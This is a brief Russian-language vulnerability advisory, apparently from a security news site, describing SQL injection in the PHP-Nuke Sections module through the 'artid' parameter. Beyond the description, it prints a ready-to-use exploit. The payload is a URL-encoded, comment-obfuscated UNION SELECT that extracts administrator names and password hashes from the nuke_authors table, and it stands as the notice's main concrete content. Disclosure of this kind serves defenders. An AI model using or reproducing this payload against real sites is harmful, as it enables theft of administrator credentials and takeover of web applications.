Программа: PHP-Nuke Module Sections

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «artid». Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

www.xxX/xxxxSections&op=viewarticle&artid=(exploit)

EXPLOIT:

9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/* */0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2



Оставить мнение